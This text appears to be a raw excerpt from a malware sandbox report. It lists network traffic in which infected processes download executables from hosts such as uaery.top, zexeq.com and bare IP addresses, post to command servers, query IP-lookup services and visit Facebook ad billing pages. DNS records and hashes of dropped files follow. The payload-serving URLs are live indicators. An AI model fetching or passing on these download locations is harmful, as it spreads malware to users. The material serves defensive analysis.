                                    http://45.9.74.80/powes.exe
                                    http
                                    38.2kB
                                    1.6MB
                                    694
                                    1159

                                    HTTP Request

                                    GET http://45.9.74.80/powes.exe

                                    HTTP Response

                                    200
                                  • 162.0.217.254:443
                                    api.2ip.ua
                                    D892.exe
                                    156 B
                                    3
                                  • 162.0.217.254:443
                                    api.2ip.ua
                                    DBEE.exe
                                    156 B
                                    3
                                  • 159.253.45.38:443
                                    https://akar.av.tr/tmp/index.php
                                    tls, http
                                    7.0kB
                                    357.2kB
                                    142
                                    263

                                    HTTP Request

                                    GET https://akar.av.tr/tmp/index.php

                                    HTTP Response

                                    200
                                  • 172.67.158.22:443
                                    https://j.ffbbjjkk.com/logo.png
                                    tls, http
                                    zyy.exe
                                    13.3kB
                                    662.8kB
                                    275
                                    531

                                    HTTP Request

                                    GET https://j.ffbbjjkk.com/2701.html

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET https://j.ffbbjjkk.com/logo.png

                                    HTTP Response

                                    200
                                  • 172.67.158.22:443
                                    https://j.ffbbjjkk.com/logo.png
                                    tls, http
                                    zyy.exe
                                    12.8kB
                                    662.4kB
                                    265
                                    517

                                    HTTP Request

                                    GET https://j.ffbbjjkk.com/2701.html

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET https://j.ffbbjjkk.com/logo.png

                                    HTTP Response

                                    200
                                  • 45.136.113.107:80
                                    http://bz.bbbeioaag.com/sts/bimage.jpg
                                    http
                                    ss31.exe
                                    55.7kB
                                    1.6MB
                                    1122
                                    1589

                                    HTTP Request

                                    GET http://bz.bbbeioaag.com/sts/bimage.jpg

                                    HTTP Response

                                    200
                                  • 45.136.113.107:80
                                    http://bz.bbbeioaag.com/sts/bimage.jpg
                                    http
                                    ss31.exe
                                    51.8kB
                                    1.6MB
                                    1123
                                    1468

                                    HTTP Request

                                    GET http://bz.bbbeioaag.com/sts/bimage.jpg

                                    HTTP Response

                                    200
                                  • 185.95.186.58:80
                                    http://uaery.top/dl/build.exe
                                    http
                                    16.4kB
                                    833.3kB
                                    344
                                    601

                                    HTTP Request

                                    GET http://uaery.top/dl/build.exe

                                    HTTP Response

                                    200
                                  • 52.178.17.3:443
                                    322 B
                                    7
                                  • 89.190.157.61:80
                                    http://ebfertility.com/portline-containers.com/serv.exe
                                    http
                                    6.6kB
                                    373.6kB
                                    139
                                    271

                                    HTTP Request

                                    GET http://ebfertility.com/portline-containers.com/serv.exe

                                    HTTP Response

                                    200
                                  • 162.0.217.254:443
                                    api.2ip.ua
                                    7C6.exe
                                    156 B
                                    3
                                  • 157.240.5.35:443
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    tls, http
                                    ss31.exe
                                    6.8kB
                                    149.3kB
                                    63
                                    118

                                    HTTP Request

                                    GET https://www.facebook.com/ads/manager/account_settings/account_billing

                                    HTTP Response

                                    302

                                    HTTP Request

                                    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET https://www.facebook.com/ads/manager/account_settings/account_billing

                                    HTTP Response

                                    302

                                    HTTP Request

                                    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing

                                    HTTP Response

                                    200
                                  • 157.240.5.35:443
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    tls, http
                                    ss31.exe
                                    6.8kB
                                    149.4kB
                                    64
                                    119

                                    HTTP Request

                                    GET https://www.facebook.com/ads/manager/account_settings/account_billing

                                    HTTP Response

                                    302

                                    HTTP Request

                                    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET https://www.facebook.com/ads/manager/account_settings/account_billing

                                    HTTP Response

                                    302

                                    HTTP Request

                                    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing

                                    HTTP Response

                                    200
                                  • 77.91.84.172:80
                                    http://77.91.84.172/s.exe
                                    http
                                    6.4kB
                                    348.3kB
                                    135
                                    264

                                    HTTP Request

                                    GET http://77.91.84.172/s.exe

                                    HTTP Response

                                    200
                                  • 45.66.159.179:80
                                    http://count.iiagjaggg.com/check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db
                                    http
                                    ss31.exe
                                    2.2kB
                                    1.5kB
                                    13
                                    10

                                    HTTP Request

                                    GET http://count.iiagjaggg.com/check/safe

                                    HTTP Response

                                    200

                                    HTTP Request

                                    POST http://count.iiagjaggg.com/check/?sid=295279&key=1395450b12c9ce7aa49d89a66f4c318f

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET http://count.iiagjaggg.com/check/safe

                                    HTTP Response

                                    200

                                    HTTP Request

                                    POST http://count.iiagjaggg.com/check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db

                                    HTTP Response

                                    200
                                  • 45.66.159.179:80
                                    http://count.iiagjaggg.com/check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10
                                    http
                                    ss31.exe
                                    2.2kB
                                    1.5kB
                                    12
                                    10

                                    HTTP Request

                                    GET http://count.iiagjaggg.com/check/safe

                                    HTTP Response

                                    200

                                    HTTP Request

                                    POST http://count.iiagjaggg.com/check/?sid=295281&key=245e0e54c838d36f90ed8c7aa82720b5

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET http://count.iiagjaggg.com/check/safe

                                    HTTP Response

                                    200

                                    HTTP Request

                                    POST http://count.iiagjaggg.com/check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10

                                    HTTP Response

                                    200
                                  • 8.238.21.126:80
                                    322 B
                                    7
                                  • 162.0.217.254:443
                                    api.2ip.ua
                                    D892.exe
                                    156 B
                                    3
                                  • 162.0.217.254:443
                                    api.2ip.ua
                                    DBEE.exe
                                    156 B
                                    3
                                  • 208.95.112.1:80
                                    http://ip-api.com/json/?fields=8198
                                    http
                                    WspService
                                    1.2kB
                                    911 B
                                    8
                                    5

                                    HTTP Request

                                    GET http://ip-api.com/json/?fields=8198

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET http://ip-api.com/json/?fields=8198

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET http://ip-api.com/json/?fields=8198

                                    HTTP Response

                                    200
                                  • 104.21.26.69:443
                                    https://h.ffbbhhtt.com/api6.php
                                    tls, http
                                    WspService
                                    1.5kB
                                    4.3kB
                                    13
                                    10

                                    HTTP Request

                                    POST https://h.ffbbhhtt.com/api6.php

                                    HTTP Response

                                    200
                                  • 104.21.26.69:443
                                    https://h.ffbbhhtt.com/api6.php
                                    tls, http
                                    WspService
                                    1.4kB
                                    1.1kB
                                    8
                                    6

                                    HTTP Request

                                    POST https://h.ffbbhhtt.com/api6.php

                                    HTTP Response

                                    200
                                  • 104.21.26.69:443
                                    https://h.ffbbhhtt.com/api6.php
                                    tls, http
                                    WspService
                                    1.4kB
                                    1.2kB
                                    8
                                    6

                                    HTTP Request

                                    POST https://h.ffbbhhtt.com/api6.php

                                    HTTP Response

                                    200
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    801 B
                                    465 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    774 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 34.80.59.191:80
                                    http://34.80.59.191/win.pac
                                    http
                                    447 B
                                    718 B
                                    7
                                    5

                                    HTTP Request

                                    GET http://34.80.59.191/win.pac

                                    HTTP Response

                                    200
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    822 B
                                    502 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 162.0.217.254:443
                                    api.2ip.ua
                                    7C6.exe
                                    156 B
                                    3
                                  • 190.211.254.211:80
                                    http://190.211.254.211/vokka.exe
                                    http
                                    72.2kB
                                    2.9MB
                                    1285
                                    2706

                                    HTTP Request

                                    GET http://190.211.254.211/vokka.exe

                                    HTTP Response

                                    200
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    845 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    735 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    881 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    724 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    835 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    721 B
                                    790 B
                                    7
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    732 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    748 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    707 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    762 B
                                    450 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    200
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    692 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 104.234.147.45:443
                                    https://104.234.147.45/6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8=
                                    tls, http
                                    rundll32.exe
                                    135.1kB
                                    4.0MB
                                    2867
                                    2863

                                    HTTP Request

                                    GET https://104.234.147.45/6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8=

                                    HTTP Response

                                    200
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    715 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    669 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 185.95.186.58:80
                                    http://uaery.top/dl/build2.exe
                                    http
                                    D892.exe
                                    22.9kB
                                    490.7kB
                                    366
                                    365

                                    HTTP Request

                                    GET http://uaery.top/dl/build2.exe

                                    HTTP Response

                                    200
                                  • 109.206.243.140:80
                                    http://hoh0aeghwugh2gie.com/
                                    http
                                    3.7kB
                                    166.2kB
                                    66
                                    124

                                    HTTP Request

                                    POST http://hoh0aeghwugh2gie.com/

                                    HTTP Response

                                    404
                                  • 203.91.116.53:80
                                    http://zexeq.com/test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true
                                    http
                                    D892.exe
                                    413 B
                                    975 B
                                    6
                                    5

                                    HTTP Request

                                    GET http://zexeq.com/test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true

                                    HTTP Response

                                    200
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    847 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 185.95.186.58:80
                                    http://uaery.top/dl/build2.exe
                                    http
                                    DBEE.exe
                                    20.4kB
                                    488.9kB
                                    354
                                    353

                                    HTTP Request

                                    GET http://uaery.top/dl/build2.exe

                                    HTTP Response

                                    200
                                  • 203.91.116.53:80
                                    http://zexeq.com/lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false
                                    http
                                    DBEE.exe
                                    415 B
                                    979 B
                                    6
                                    5

                                    HTTP Request

                                    GET http://zexeq.com/lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false

                                    HTTP Response

                                    200
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    819 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    848 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 203.91.116.53:80
                                    http://zexeq.com/files/1/build3.exe
                                    http
                                    D892.exe
                                    646 B
                                    10.5kB
                                    12
                                    11

                                    HTTP Request

                                    GET http://zexeq.com/files/1/build3.exe

                                    HTTP Response

                                    200
                                  • 149.154.167.99:443
                                    https://t.me/zaskullz
                                    tls, http
                                    build2.exe
                                    1.5kB
                                    19.4kB
                                    23
                                    20

                                    HTTP Request

                                    GET https://t.me/zaskullz

                                    HTTP Response

                                    200
                                  • 203.91.116.53:80
                                    http://zexeq.com/files/1/build3.exe
                                    http
                                    DBEE.exe
                                    646 B
                                    10.5kB
                                    12
                                    11

                                    HTTP Request

                                    GET http://zexeq.com/files/1/build3.exe

                                    HTTP Response

                                    200
                                  • 116.203.13.130:80
                                    http://116.203.13.130/edit.zip
                                    http
                                    build2.exe
                                    91.5kB
                                    2.8MB
                                    1980
                                    1979

                                    HTTP Request

                                    GET http://116.203.13.130/

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET http://116.203.13.130/edit.zip

                                    HTTP Response

                                    200
                                  • 185.95.186.58:80
                                    http://uaery.top/dl/build2.exe
                                    http
                                    7C6.exe
                                    21.2kB
                                    487.8kB
                                    361
                                    360

                                    HTTP Request

                                    GET http://uaery.top/dl/build2.exe

                                    HTTP Response

                                    200
                                  • 203.91.116.53:80
                                    http://zexeq.com/files/1/build3.exe
                                    http
                                    7C6.exe
                                    646 B
                                    10.5kB
                                    12
                                    11

                                    HTTP Request

                                    GET http://zexeq.com/files/1/build3.exe

                                    HTTP Response

                                    200
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                  • 8.8.8.8:53
                                    potunulit.org
                                    dns
                                    59 B
                                    91 B
                                    1
                                    1

                                    DNS Request

                                    potunulit.org

                                    DNS Response

                                    172.67.181.144
                                    104.21.18.99

                                  • 8.8.8.8:53
                                    uaery.top
                                    dns
                                    7C6.exe
                                    55 B
                                    215 B
                                    1
                                    1

                                    DNS Request

                                    uaery.top

                                    DNS Response

                                    185.95.186.58
                                    187.170.21.149
                                    211.40.39.251
                                    211.104.254.139
                                    190.229.19.7
                                    178.30.120.200
                                    187.224.55.97
                                    211.119.84.112
                                    195.158.3.162
                                    175.120.254.9

                                  • 8.8.8.8:53
                                    144.181.67.172.in-addr.arpa
                                    dns
                                    73 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    144.181.67.172.in-addr.arpa

                                  • 8.8.8.8:53
                                    58.186.95.185.in-addr.arpa
                                    dns
                                    72 B
                                    132 B
                                    1
                                    1

                                    DNS Request

                                    58.186.95.185.in-addr.arpa

                                  • 8.8.8.8:53
                                    api.2ip.ua
                                    dns
                                    7C6.exe
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    api.2ip.ua

                                    DNS Response

                                    162.0.217.254

                                  • 8.8.8.8:53
                                    80.74.9.45.in-addr.arpa
                                    dns
                                    69 B
                                    123 B
                                    1
                                    1

                                    DNS Request

                                    80.74.9.45.in-addr.arpa

                                  • 8.8.8.8:53
                                    akar.av.tr
                                    dns
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    akar.av.tr

                                    DNS Response

                                    159.253.45.38

                                  • 8.8.8.8:53
                                    bz.bbbeioaag.com
                                    dns
                                    ss31.exe
                                    62 B
                                    78 B
                                    1
                                    1

                                    DNS Request

                                    bz.bbbeioaag.com

                                    DNS Response

                                    45.136.113.107

                                  • 8.8.8.8:53
                                    38.45.253.159.in-addr.arpa
                                    dns
                                    72 B
                                    132 B
                                    1
                                    1

                                    DNS Request

                                    38.45.253.159.in-addr.arpa

                                  • 8.8.8.8:53
                                    j.ffbbjjkk.com
                                    dns
                                    zyy.exe
                                    60 B
                                    92 B
                                    1
                                    1

                                    DNS Request

                                    j.ffbbjjkk.com

                                    DNS Response

                                    172.67.158.22
                                    104.21.8.227

                                  • 8.8.8.8:53
                                    22.158.67.172.in-addr.arpa
                                    dns
                                    72 B
                                    134 B
                                    1
                                    1

                                    DNS Request

                                    22.158.67.172.in-addr.arpa

                                  • 8.8.8.8:53
                                    107.113.136.45.in-addr.arpa
                                    dns
                                    73 B
                                    122 B
                                    1
                                    1

                                    DNS Request

                                    107.113.136.45.in-addr.arpa

                                  • 8.8.8.8:53
                                    y1.ffbbyykk.com
                                    dns
                                    WspService
                                    61 B
                                    77 B
                                    1
                                    1

                                    DNS Request

                                    y1.ffbbyykk.com

                                    DNS Response

                                    34.142.181.181

                                  • 8.8.8.8:53
                                    y1.ffbbyykk.com
                                    dns
                                    WspService
                                    61 B
                                    120 B
                                    1
                                    1

                                    DNS Request

                                    y1.ffbbyykk.com

                                  • 34.142.181.181:53
                                    y1.ffbbyykk.com
                                    WspService
                                    75.8kB
                                    807.1kB
                                    1445
                                    1457
                                  • 8.8.8.8:53
                                    52.4.107.13.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    52.4.107.13.in-addr.arpa

                                  • 8.8.8.8:53
                                    181.181.142.34.in-addr.arpa
                                    dns
                                    73 B
                                    126 B
                                    1
                                    1

                                    DNS Request

                                    181.181.142.34.in-addr.arpa

                                  • 8.8.8.8:53
                                    ebfertility.com
                                    dns
                                    61 B
                                    77 B
                                    1
                                    1

                                    DNS Request

                                    ebfertility.com

                                    DNS Response

                                    89.190.157.61

                                  • 8.8.8.8:53
                                    61.157.190.89.in-addr.arpa
                                    dns
                                    72 B
                                    132 B
                                    1
                                    1

                                    DNS Request

                                    61.157.190.89.in-addr.arpa

                                  • 8.8.8.8:53
                                    www.facebook.com
                                    dns
                                    ss31.exe
                                    62 B
                                    107 B
                                    1
                                    1

                                    DNS Request

                                    www.facebook.com

                                    DNS Response

                                    157.240.5.35

                                  • 8.8.8.8:53
                                    count.iiagjaggg.com
                                    dns
                                    ss31.exe
                                    65 B
                                    81 B
                                    1
                                    1

                                    DNS Request

                                    count.iiagjaggg.com

                                    DNS Response

                                    45.66.159.179

                                  • 8.8.8.8:53
                                    35.5.240.157.in-addr.arpa
                                    dns
                                    71 B
                                    124 B
                                    1
                                    1

                                    DNS Request

                                    35.5.240.157.in-addr.arpa

                                  • 8.8.8.8:53
                                    172.84.91.77.in-addr.arpa
                                    dns
                                    71 B
                                    105 B
                                    1
                                    1

                                    DNS Request

                                    172.84.91.77.in-addr.arpa

                                  • 8.8.8.8:53
                                    179.159.66.45.in-addr.arpa
                                    dns
                                    72 B
                                    120 B
                                    1
                                    1

                                    DNS Request

                                    179.159.66.45.in-addr.arpa

                                  • 8.8.8.8:53
                                    ip-api.com
                                    dns
                                    WspService
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    ip-api.com

                                    DNS Response

                                    208.95.112.1

                                  • 8.8.8.8:53
                                    h.ffbbhhtt.com
                                    dns
                                    WspService
                                    60 B
                                    92 B
                                    1
                                    1

                                    DNS Request

                                    h.ffbbhhtt.com

                                    DNS Response

                                    104.21.26.69
                                    172.67.168.62

                                  • 8.8.8.8:53
                                    1.112.95.208.in-addr.arpa
                                    dns
                                    71 B
                                    95 B
                                    1
                                    1

                                    DNS Request

                                    1.112.95.208.in-addr.arpa

                                  • 8.8.8.8:53
                                    69.26.21.104.in-addr.arpa
                                    dns
                                    71 B
                                    133 B
                                    1
                                    1

                                    DNS Request

                                    69.26.21.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    126.135.241.8.in-addr.arpa
                                    dns
                                    72 B
                                    126 B
                                    1
                                    1

                                    DNS Request

                                    126.135.241.8.in-addr.arpa

                                  • 8.8.8.8:53
                                    76.38.195.152.in-addr.arpa
                                    dns
                                    72 B
                                    143 B
                                    1
                                    1

                                    DNS Request

                                    76.38.195.152.in-addr.arpa

                                  • 8.8.8.8:53
                                    vispik.at
                                    dns
                                    55 B
                                    215 B
                                    1
                                    1

                                    DNS Request

                                    vispik.at

                                    DNS Response

                                    176.226.127.181
                                    222.236.49.124
                                    190.229.19.7
                                    211.53.230.67
                                    123.140.161.243
                                    187.245.185.123
                                    187.224.55.97
                                    195.158.3.162
                                    86.122.83.142
                                    187.156.88.173

                                  • 8.8.8.8:53
                                    181.127.226.176.in-addr.arpa
                                    dns
                                    74 B
                                    123 B
                                    1
                                    1

                                    DNS Request

                                    181.127.226.176.in-addr.arpa

                                  • 8.8.8.8:53
                                    191.59.80.34.in-addr.arpa
                                    dns
                                    71 B
                                    122 B
                                    1
                                    1

                                    DNS Request

                                    191.59.80.34.in-addr.arpa

                                  • 8.8.8.8:53
                                    211.254.211.190.in-addr.arpa
                                    dns
                                    74 B
                                    113 B
                                    1
                                    1

                                    DNS Request

                                    211.254.211.190.in-addr.arpa

                                  • 8.8.8.8:53
                                    zexeq.com
                                    dns
                                    7C6.exe
                                    55 B
                                    215 B
                                    1
                                    1

                                    DNS Request

                                    zexeq.com

                                    DNS Response

                                    203.91.116.53
                                    190.141.123.88
                                    211.53.230.67
                                    178.30.120.200
                                    86.122.83.142
                                    187.156.88.173
                                    211.40.39.251
                                    175.126.109.15
                                    211.171.233.126
                                    58.235.189.192

                                  • 8.8.8.8:53
                                    hoh0aeghwugh2gie.com
                                    dns
                                    66 B
                                    82 B
                                    1
                                    1

                                    DNS Request

                                    hoh0aeghwugh2gie.com

                                    DNS Response

                                    109.206.243.140

                                  • 8.8.8.8:53
                                    45.147.234.104.in-addr.arpa
                                    dns
                                    73 B
                                    139 B
                                    1
                                    1

                                    DNS Request

                                    45.147.234.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    140.243.206.109.in-addr.arpa
                                    dns
                                    74 B
                                    149 B
                                    1
                                    1

                                    DNS Request

                                    140.243.206.109.in-addr.arpa

                                  • 8.8.8.8:53
                                    53.116.91.203.in-addr.arpa
                                    dns
                                    72 B
                                    160 B
                                    1
                                    1

                                    DNS Request

                                    53.116.91.203.in-addr.arpa

                                  • 8.8.8.8:53
                                    t.me
                                    dns
                                    build2.exe
                                    50 B
                                    66 B
                                    1
                                    1

                                    DNS Request

                                    t.me

                                    DNS Response

                                    149.154.167.99

                                  • 8.8.8.8:53
                                    99.167.154.149.in-addr.arpa
                                    dns
                                    73 B
                                    166 B
                                    1
                                    1

                                    DNS Request

                                    99.167.154.149.in-addr.arpa

                                  • 8.8.8.8:53
                                    22.249.124.192.in-addr.arpa
                                    dns
                                    73 B
                                    113 B
                                    1
                                    1

                                    DNS Request

                                    22.249.124.192.in-addr.arpa

                                  • 8.8.8.8:53
                                    130.13.203.116.in-addr.arpa
                                    dns
                                    73 B
                                    131 B
                                    1
                                    1

                                    DNS Request

                                    130.13.203.116.in-addr.arpa

                                  • 8.8.8.8:53
                                    50.4.107.13.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    50.4.107.13.in-addr.arpa

                                  MITRE ATT&CK Enterprise v6

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\SystemID\PersonalID.txt

                                    Filesize

                                    84B

                                    MD5

                                    8a336d5bff8f129e980f6d2038544ccb

                                    SHA1

                                    5238d75ab615dcdd09eef84e8f93f42bd7a1a37b

                                    SHA256

                                    63faf4362c0b32dc765847896fdb1484957c29a92a4b601ba573e85c784faacd

                                    SHA512

                                    83178f9fa1e0c8878f486923f1d6f3b007c565b10e3bfdf4818afb188c339ff9674bbf35bef74b017b1e081cf434ed823b5e3461f06c3d0d4faf1da98195af47

                                  • C:\Users\Admin\AppData\Local\0b95f0a2-0096-4715-9678-79624e8cd7f9\D892.exe

                                    Filesize

                                    790KB

                                    MD5

                                    7e79fbc05e59e5b7e91ebd0c5a2efe78

                                    SHA1

                                    8d0c7ca5e6e97cdf369238f2d2f40182793810ee

                                    SHA256

                                    56221b7ad16a9c49d02a3916fba76504b9e4d66d9150b7e882f9a0747208ec80

                                    SHA512

                                    bd8005e66585f78bc5146431682738e33488a59348c6f4fbcffe96c6182506f61e2367846e7e950c3f4f92d639d94c26ab105276de3c07a5085e10785e48503d

                                  • C:\Users\Admin\AppData\Local\0b95f0a2-0096-4715-9678-79624e8cd7f9\D892.exe

                                    Filesize

                                    790KB

                                    MD5

                                    7e79fbc05e59e5b7e91ebd0c5a2efe78

                                    SHA1

                                    8d0c7ca5e6e97cdf369238f2d2f40182793810ee

                                    SHA256

                                    56221b7ad16a9c49d02a3916fba76504b9e4d66d9150b7e882f9a0747208ec80

                                    SHA512

                                    bd8005e66585f78bc5146431682738e33488a59348c6f4fbcffe96c6182506f61e2367846e7e950c3f4f92d639d94c26ab105276de3c07a5085e10785e48503d

                                  • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe

                                    Filesize

                                    462KB

                                    MD5

                                    1ea00519a643ae1ab0f4f9a6ecc81ead

                                    SHA1

                                    551c4fd300092a51a7fd3ceee009db249fd2a70f

                                    SHA256

                                    04e8128c405994d18f26b6394b32686c6e07a65b2c90c98f16295a48a16ba683

                                    SHA512

                                    187897c856c6b7b45d9f85898103b8560d25c694c150c1c1efd1370be0c4e3ba3799d2f4c3cc5c2618b0a84f80cff19cf9be47d0961df20c47b73783f6d0491d

                                  • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe

                                    Filesize

                                    462KB

                                    MD5

